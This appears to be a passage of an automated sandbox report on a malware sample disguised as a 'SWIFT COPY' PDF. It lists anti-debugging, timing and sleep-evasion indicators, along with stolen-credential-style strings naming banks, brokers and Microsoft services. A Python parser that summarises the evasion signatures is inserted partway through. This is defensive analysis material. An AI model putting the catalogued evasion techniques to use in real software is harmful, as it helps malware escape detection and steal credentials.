                Source: Binary string: wntdll.pdb | source: SWIFT COPY 0028_pdf.exe, 00000000.00000003.2154550142.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, SWIFT COPY 0028_pdf.exe, 00000000.00000003.2153324320.0000000003940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2315069087.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2221830371.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315069087.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2219817771.0000000003800000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, rasautou.exe, 00000004.00000002.4613707846.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2322691574.0000000004A7F000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4613707846.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2326045959.0000000004C23000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb | source: rasautou.exe, 00000004.00000002.4606460151.0000000003177000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4614264307.00000000053FC000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2619893356.00000000245FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP | source: rasautou.exe, 00000004.00000002.4606460151.0000000003177000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4614264307.00000000053FC000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2619893356.00000000245FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: rasautou.pdbGCTL | source: svchost.exe, 00000002.00000002.2314913469.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2282220992.0000000003613000.00000004.00000020.00020000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000003.00000003.2252387323.000000000081B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: rasautou.pdb | source: svchost.exe, 00000002.00000002.2314913469.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2282220992.0000000003613000.00000004.00000020.00020000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000003.00000003.2252387323.000000000081B000.00000004.00000020.00020000.00000000.sdmp
                Source: SWIFT COPY 0028_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: SWIFT COPY 0028_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: SWIFT COPY 0028_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: SWIFT COPY 0028_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: SWIFT COPY 0028_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0093E01E LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00988111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00988111
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0093EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0093EB42
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0094123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0094123A
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rasautou.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rasautou.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rasautou.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rasautou.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rasautou.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe API/Special instruction interceptor: Address: 102811C
                Source: C:\Windows\SysWOW64\rasautou.exe API/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\rasautou.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\rasautou.exe API/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\rasautou.exe API/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\rasautou.exe API/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\rasautou.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\rasautou.exe API/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\rasautou.exe API/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C7096E rdtsc 2_2_03C7096E
                Source: C:\Windows\SysWOW64\rasautou.exe Window / User API: threadDelayed 9839
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Evaded block: after key decision graph_0-94934
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-95465
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe API coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\rasautou.exe API coverage: 2.6 %
                Source: C:\Windows\SysWOW64\rasautou.exe TID: 5168 Thread sleep count: 134 > 30
                Source: C:\Windows\SysWOW64\rasautou.exe TID: 5168 Thread sleep time: -268000s >= -30000s
                Source: C:\Windows\SysWOW64\rasautou.exe TID: 5168 Thread sleep count: 9839 > 30
                Source: C:\Windows\SysWOW64\rasautou.exe TID: 5168 Thread sleep time: -19678000s >= -30000s
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe TID: 3544 Thread sleep time: -80000s >= -30000s
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe TID: 3544 Thread sleep count: 44 > 30
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe TID: 3544 Thread sleep time: -66000s >= -30000s
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe TID: 3544 Thread sleep count: 44 > 30
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe TID: 3544 Thread sleep time: -44000s >= -30000s
                Source: C:\Windows\SysWOW64\rasautou.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\rasautou.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Code function: 0_2_00966CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00966CA9
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Code function: 0_2_009660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009660DD
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Code function: 0_2_009663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009663F9
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Code function: 0_2_0096EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0096EB60
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Code function: 0_2_0096F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0096F5FA
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Code function: 0_2_0096F56F FindFirstFileW,FindClose,0_2_0096F56F
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Code function: 0_2_00971B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00971B2F
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Code function: 0_2_00971C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00971C8A
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Code function: 0_2_00971F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00971F94
                Source: C:\Windows\SysWOW64\rasautou.exe Code function: 4_2_02E6CC00 FindFirstFileW,FindNextFileW,FindClose,4_2_02E6CC00
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Code function: 0_2_0093DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0093DDC0
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007EE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,116964875L
                Source: 3q3Zl7JL.4.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 3q3Zl7JL.4.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 3q3Zl7JL.4.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 3q3Zl7JL.4.dr Binary or memory string: discord.comVMware20,11696487552f
                Source: 3q3Zl7JL.4.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007EE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware2
                Source: 3q3Zl7JL.4.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007EE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ive Brokers - GDCDYNVMware20,116
                Source: 3q3Zl7JL.4.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 3q3Zl7JL.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 3q3Zl7JL.4.dr Binary or memory string: global block list test formVMware20,11696487552
                Source: 3q3Zl7JL.4.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 3q3Zl7JL.4.dr Binary or memory string: tasks.office.comVMware20,11696487552o
                Source: 3q3Zl7JL.4.dr Binary or memory string: AMC password management pageVMware20,11696487552
                Source: rasautou.exe, 00000004.00000002.4606460151.0000000003177000.00000004.00000020.00020000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4612180674.0000000001109000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 3q3Zl7JL.4.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: firefox.exe, 00000009.00000002.2621176407.00000252644FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
                Source: 3q3Zl7JL.4.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 3q3Zl7JL.4.dr Binary or memory string: dev.azure.comVMware20,11696487552j
                Source: 3q3Zl7JL.4.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 3q3Zl7JL.4.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: 3q3Zl7JL.4.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 3q3Zl7JL.4.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 3q3Zl7JL.4.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 3q3Zl7JL.4.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 3q3Zl7JL.4.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 3q3Zl7JL.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 3q3Zl7JL.4.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 3q3Zl7JL.4.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007EE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: n PasswordVMware
                Source: 3q3Zl7JL.4.dr Binary or memory string: outlook.office.comVMware20,11696487552s
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007EE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: n.utiitsl.comVMware20,11696487552h
                Source: 3q3Zl7JL.4.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 3q3Zl7JL.4.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 3q3Zl7JL.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 3q3Zl7JL.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 3q3Zl7JL.4.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe API call chain: ExitProcess graph end node graph_0-93998
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe API call chain: ExitProcess graph end node graph_0-95218
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\rasautou.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C7096E rdtsc 2_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417E23 LdrLoadDll,2_2_00417E23
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Code function: 0_2_00976AAF BlockInput,0_2_00976AAF
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Code function: 0_2_00923D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00923D19
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Code function: 0_2_00953920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00953920
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Code function: 0_2_0093E01E LoadLibraryA,GetProcAddress,0_2_0093E01E
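The sleep, rdtsc, DebugPort and fs:[30h] signatures in this section are easier to weigh per process than as a flat list. The parser below is an added example written for this page, not Joe Sandbox code: it splits each extracted Source line on the report's own signature keywords, aggregates the evasion indicators per source, and labels each source using the thresholds the report itself prints (sleep count > 30, sleep time >= 30000 in the report's printed unit). The input is constructed from lines quoted in this section; the technique labels and the _VM_TOKENS vendor list are the example's own assumptions.

```python
import re
from collections import defaultdict

# Signature keywords as the report prints them. Extraction glued each keyword to the
# preceding path ("svchost.exeCode function:"), so we split on the earliest keyword found.
_KEYWORDS = (
    "Code function:", "Process queried:", "Process information queried:",
    "Thread sleep count:", "Thread sleep time:", "Binary or memory string:",
    "API coverage:", "API/Special instruction interceptor:", "Window / User API:",
)
_VM_TOKENS = ("VMware", "VirtualBox", "VBox", "QEMU", "Hyper-V")  # assumed vendor list, not the report's
_TID_RE = re.compile(r"\s*TID:\s*(\d+)\s*$")
_INT_RE = re.compile(r"-?\d+")


def split_signature(line):
    """Return (source, tid, keyword, payload) for one 'Source: ...' line, or None."""
    body = line.strip()
    if body.startswith("Source:"):
        body = body[len("Source:"):].lstrip()
    hits = [(body.find(k), k) for k in _KEYWORDS if k in body]
    if not hits:
        return None
    idx, kw = min(hits)
    src, payload = body[:idx].strip(" ,"), body[idx + len(kw):].strip()
    tid, m = None, _TID_RE.search(src)
    if m:
        tid, src = int(m.group(1)), src[:m.start()].rstrip()
    return src, tid, kw, payload


def _new_record():
    return {"sleep_count": 0, "sleep_time": 0, "peb_reads": 0, "rdtsc": 0,
            "debugport": 0, "api_debug_checks": 0, "block_input": 0, "vm_strings": []}


def summarise(lines):
    """Aggregate evasion indicators per source (process image or dropped file)."""
    per_source = defaultdict(_new_record)
    for line in lines:
        parsed = split_signature(line)
        if parsed is None:
            continue
        src, _tid, kw, payload = parsed
        rec = per_source[src]
        if kw == "Thread sleep count:":
            # Successive snapshots are printed ("134 > 30", later "9839 > 30"): keep the max.
            rec["sleep_count"] = max(rec["sleep_count"], int(_INT_RE.search(payload).group()))
        elif kw == "Thread sleep time:":
            rec["sleep_time"] = max(rec["sleep_time"], abs(int(_INT_RE.search(payload).group())))
        elif kw == "Code function:":
            if "fs:[00000030h]" in payload:   # TEB->PEB read, the BeingDebugged/NtGlobalFlag idiom
                rec["peb_reads"] += 1
            if "rdtsc" in payload:
                rec["rdtsc"] += 1
            if "IsDebuggerPresent" in payload or "OutputDebugString" in payload:
                rec["api_debug_checks"] += 1
            if "BlockInput" in payload:
                rec["block_input"] += 1
        elif kw == "Process queried:" and "DebugPort" in payload:
            rec["debugport"] += 1
        elif kw == "Binary or memory string:":
            rec["vm_strings"].extend(t for t in _VM_TOKENS if t in payload)
    return dict(per_source)


def techniques(rec, count_threshold=30, time_threshold=30000):
    """Label a record with the techniques it evidences; thresholds mirror the report's own."""
    found = set()
    if rec["sleep_count"] > count_threshold or rec["sleep_time"] >= time_threshold:
        found.add("sleep-evasion")
    if rec["rdtsc"]:
        found.add("timing-check")
    if rec["debugport"] or rec["api_debug_checks"] or rec["peb_reads"]:
        found.add("debugger-check")
    if rec["block_input"]:
        found.add("input-blocking")
    if rec["vm_strings"]:
        found.add("vm-string")   # evidence to triage, not proof of a VM check (see note below)
    return found


def mean_sleep_interval(rec):
    """Reported sleep time per reported call, in the unit the report prints."""
    return rec["sleep_time"] / rec["sleep_count"] if rec["sleep_count"] else 0.0


# Constructed input: lines copied from this section of the report, exactly as extracted.
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E rdtsc 2_2_03C7096E
Source: C:\Windows\SysWOW64\rasautou.exe TID: 5168Thread sleep count: 134 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe TID: 5168Thread sleep time: -268000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe TID: 5168Thread sleep count: 9839 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe TID: 5168Thread sleep time: -19678000s >= -30000sJump to behavior
Source: 3q3Zl7JL.4.drBinary or memory string: bankofamerica.comVMware20,11696487552x
Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rasautou.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00976AAF BlockInput,0_2_00976AAF
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00923D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00923D19
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_01028388 mov eax, dword ptr fs:[00000030h]0_2_01028388
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
""".strip().splitlines()

REPORT = summarise(SAMPLE_LINES)
```

The vm-string label is kept apart from the others on purpose. Every VMware hit in this section comes from the dropped file 3q3Zl7JL.4.dr or from rasautou.exe memory and sits beside banking, broker and Office hostnames, and the Hyper-V RAW string also appears in firefox.exe memory, so an analyst should check whether such a string is a VM test in the sample's own code or data the sample collected before counting it as evasion. The ratio the example computes for rasautou.exe TID 5168, 19678000 / 9839 = 2000 per call, shows a fixed sleep interval repeated in a loop; the unit suffix is the report's and is not converted.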
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Code function: 0_2_01028388 mov eax, dword ptr fs:[00000030h] 0_2_01028388
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Code function: 0_2_010283E8 mov eax, dword ptr fs:[00000030h] 0_2_010283E8
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe Code function: 0_2_01026D58 mov eax, dword ptr fs:[00000030h] 0_2_01026D58
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEC3CD mov eax, dword ptr fs:[00000030h] 2_2_03CEC3CD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h] 2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h] 2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h] 2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h] 2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB63C0 mov eax, dword ptr fs:[00000030h] 2_2_03CB63C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE3DB mov ecx, dword ptr fs:[00000030h] 2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h] 2_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h] 2_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C663FF mov eax, dword ptr fs:[00000030h] 2_2_03C663FF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h] 2_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h] 2_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h] 2_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h] 2_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h] 2_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h] 2_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h] 2_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h] 2_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
